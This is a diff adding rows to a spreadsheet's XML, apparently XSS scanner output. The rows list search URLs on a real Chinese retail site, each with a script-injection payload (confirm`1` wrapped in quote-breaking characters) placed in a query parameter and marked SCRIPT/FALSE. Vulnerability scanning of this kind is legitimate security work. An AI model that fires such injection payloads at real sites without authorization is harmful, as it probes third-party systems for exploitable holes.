+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode="; confirm`1`; "&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B67" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C67" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D67" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="68">
+      <c r="A68" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode='; confirm`1`; '&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B68" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C68" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D68" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="69">
+      <c r="A69" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType="; confirm`1`; "&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B69" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C69" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D69" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="70">
+      <c r="A70" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType='; confirm`1`; '&amp;search_mode=normal&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B70" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C70" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D70" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="71">
+      <c r="A71" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode="; confirm`1`; "&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B71" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C71" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D71" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="72">
+      <c r="A72" t="inlineStr">
+        <is>
+          <t>https://search.gome.com.cn/search?question=new&amp;searchType=goods&amp;search_mode='; confirm`1`; '&amp;reWrite=true&amp;instock=1</t>
+        </is>
+      </c>
+      <c r="B72" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C72" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D72" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>
